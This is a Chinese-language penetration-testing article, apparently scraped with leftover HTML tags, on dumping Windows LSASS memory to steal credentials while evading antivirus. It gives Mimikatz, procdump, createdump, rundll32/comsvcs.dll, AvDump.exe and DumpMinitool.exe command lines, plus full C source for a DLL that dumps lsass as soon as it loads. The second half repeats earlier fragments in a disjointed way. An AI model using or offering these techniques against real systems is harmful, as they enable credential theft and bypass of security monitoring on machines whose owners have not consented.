绕过杀软进行Lsass进程Dump的多种方法<\/h1>

前言<\/h2>
在Windows渗透测试中，获取用户凭证信息是至关重要的一步。当目标机器没有杀毒软件时，只要有足够权限，可以自由读取Lsass进程；但当存在杀毒软件时，需要使用特殊技巧绕过检测。<\/p>

直接方法<\/h2>

Mimikatz直接读取<\/h3>

privilege::debug
<\/span><\/span>sekurlsa::logonpasswords
<\/span><\/span><\/code><\/pre>问题<\/strong>：几乎所有杀毒软件都会拦截此操作，必须对mimikatz进行免杀处理。<\/p>
离线解析方法<\/h2>
更倾向于使用白名单程序进行离线dump，然后解析密码。<\/p>
白名单程序方法<\/h2>
1. Procdump.exe<\/h3>
微软签名程序，但大部分AV厂商仍会查杀<\/p>
procdump.exe -ma lsass.exe 1.txt
<\/span><\/span><\/code><\/pre>2. SQLDumper.exe<\/h3>
同样拥有微软签名，但效果与Procdump类似<\/p>
3. Createdump.exe<\/h3>
.NET 5引入的native binary，有签名但仍被查杀<\/p>
createdump.exe -u -f lsass.dmp lsass[<\/span>PID]<\/span>
<\/span><\/span><\/code><\/pre>4. Rundll32 + comsvcs.dll<\/h3>
rundll32.exe C:\w<\/span>indows\S<\/span>ystem32\c<\/span>omsvcs.dll, MiniDump (<\/span>Get-Process lsass)<\/span>.id Desktop\l<\/span>sass-comsvcs.dmp full
<\/span><\/span><\/code><\/pre>问题<\/strong>：同样会被查杀<\/p>
有效白名单方法<\/h2>
1. AvDump.exe<\/h3>
Avast杀毒软件自带程序，带有Avast数字签名<\/p>
AvDump.exe --pid 980<\/span> --exception_ptr 0<\/span> --thread_id 0<\/span> --dump_level 1<\/span> --dump_file lsass.dmp
<\/span><\/span><\/code><\/pre>路径<\/strong>：C:\Program Files\Avast Software\Avast<\/code><\/p>
2. DumpMinitool.exe<\/h3>
Visual Studio 2022中的工具<\/p>
DumpMinitool.exe --file 1.txt --processId 980<\/span> --dumpType Full
<\/span><\/span><\/code><\/pre>路径<\/strong>：C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions<\/code><\/p>
其他技术<\/h2>
SilentProcessExit机制<\/h3>
利用静默退出机制派生werfault.exe进程进行dump

问题<\/strong>：需要修改注册表，会被查杀<\/p>
自定义DLL方法<\/h2>
编写自定义DLL进行dump，杀软无感<\/p>
代码实现<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <Windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <tlhelp32.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>typedef<\/span> HRESULT<\/span>(WINAPI*<\/span> _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);
<\/span><\/span>
<\/span><\/span>int<\/span> GetLsassPid<\/span>() {
<\/span><\/span>    PROCESSENTRY32 entry;
<\/span><\/span>    entry.dwSize =<\/span> sizeof<\/span>(PROCESSENTRY32);
<\/span><\/span>    HANDLE hSnapshot =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
<\/span><\/span>    if<\/span> (Process32First(hSnapshot, &<\/span>entry)) {
<\/span><\/span>        while<\/span> (Process32Next(hSnapshot, &<\/span>entry)) {
<\/span><\/span>            if<\/span> (wcscmp(entry.szExeFile, L<\/span>"lsass.exe"<\/span>) ==<\/span> 0<\/span>) {
<\/span><\/span>                return<\/span> entry.th32ProcessID;
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    CloseHandle(hSnapshot);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> GetDebugPrivilege<\/span>() {
<\/span><\/span>    BOOL fOk =<\/span> FALSE;
<\/span><\/span>    HANDLE hToken;
<\/span><\/span>    if<\/span> (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &<\/span>hToken)) {
<\/span><\/span>        TOKEN_PRIVILEGES tp;
<\/span><\/span>        tp.PrivilegeCount =<\/span> 1<\/span>;
<\/span><\/span>        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &<\/span>tp.Privileges[0<\/span>].Luid);
<\/span><\/span>        tp.Privileges[0<\/span>].Attributes =<\/span> true ?<\/span> SE_PRIVILEGE_ENABLED : 0<\/span>;
<\/span><\/span>        AdjustTokenPrivileges(hToken, FALSE, &<\/span>tp, sizeof<\/span>(tp), NULL, NULL);
<\/span><\/span>        fOk =<\/span> (GetLastError() ==<\/span> ERROR_SUCCESS);
<\/span><\/span>        CloseHandle(hToken);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> DumpLsass<\/span>() {
<\/span><\/span>    wchar_t ws[100<\/span>];
<\/span><\/span>    _MiniDumpW MiniDumpW;
<\/span><\/span>    MiniDumpW =<\/span> (_MiniDumpW)GetProcAddress(LoadLibrary(L<\/span>"comsvcs.dll"<\/span>), "MiniDumpW"<\/span>);
<\/span><\/span>    swprintf(ws, 100<\/span>, L<\/span>"%u %hs"<\/span>, GetLsassPid(), "c:<\/span>\\<\/span>windows<\/span>\\<\/span>temp<\/span>\\<\/span>temp.bin full"<\/span>);
<\/span><\/span>    GetDebugPrivilege();
<\/span><\/span>    MiniDumpW(0<\/span>, 0<\/span>, ws);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>BOOL APIENTRY DllMain<\/span>(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
<\/span><\/span>    switch<\/span> (ul_reason_for_call) {
<\/span><\/span>    case<\/span> DLL_PROCESS_ATTACH:
<\/span><\/span>        DumpLsass();
<\/span><\/span>        break<\/span>;
<\/span><\/span>    case<\/span> DLL_THREAD_ATTACH:
<\/span><\/span>    case<\/span> DLL_THREAD_DETACH:
<\/span><\/span>    case<\/span> DLL_PROCESS_DETACH:
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>    return<\/span> TRUE;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>实现步骤<\/h3>

获取Debug权限<\/li>
找到lsass的PID<\/li>
使用MiniDump或MiniDumpWriteDump进行内存dump<\/li>
<\/ol>
总结<\/h2>
最有效的方法包括：<\/p>

使用Avast的AvDump.exe<\/li>
使用VS2022的DumpMinitool.exe<\/li>
编写自定义DLL利用comsvcs.dll的MiniDump功能<\/li>
<\/ol>
这些方法都能绕过大多数杀毒软件的检测，成功dump lsass进程内存。<\/p>

绕过杀软进行Lsass进程Dump的多种方法<\/h1>

前言<\/h2> 在Windows渗透测试中，获取用户凭证信息是至关重要的一步。当目标机器没有杀毒软件时，只要有足够权限，可以自由读取Lsass进程；但当存在杀毒软件时，需要使用特殊技巧绕过检测。<\/p>

直接方法<\/h2>

白名单程序方法<\/h2>

2. SQLDumper.exe<\/h3> 同样拥有微软签名，但效果与Procdump类似<\/p>

SilentProcessExit机制<\/h3> 利用静默退出机制派生werfault.exe进程进行dump 问题<\/strong>：需要修改注册表，会被查杀<\/p>

总结<\/h2> 最有效的方法包括：<\/p> 使用Avast的AvDump.exe<\/li> 使用VS2022的DumpMinitool.exe<\/li> 编写自定义DLL利用comsvcs.dll的MiniDump功能<\/li> <\/ol> 这些方法都能绕过大多数杀毒软件的检测，成功dump lsass进程内存。<\/p>

前言<\/h2>
在Windows渗透测试中，获取用户凭证信息是至关重要的一步。当目标机器没有杀毒软件时，只要有足够权限，可以自由读取Lsass进程；但当存在杀毒软件时，需要使用特殊技巧绕过检测。<\/p>

2. SQLDumper.exe<\/h3>
同样拥有微软签名，但效果与Procdump类似<\/p>

SilentProcessExit机制<\/h3>
利用静默退出机制派生werfault.exe进程进行dump
问题<\/strong>：需要修改注册表，会被查杀<\/p>

总结<\/h2>
最有效的方法包括：<\/p>

使用Avast的AvDump.exe<\/li>
使用VS2022的DumpMinitool.exe<\/li>
编写自定义DLL利用comsvcs.dll的MiniDump功能<\/li> <\/ol>
这些方法都能绕过大多数杀毒软件的检测，成功dump lsass进程内存。<\/p>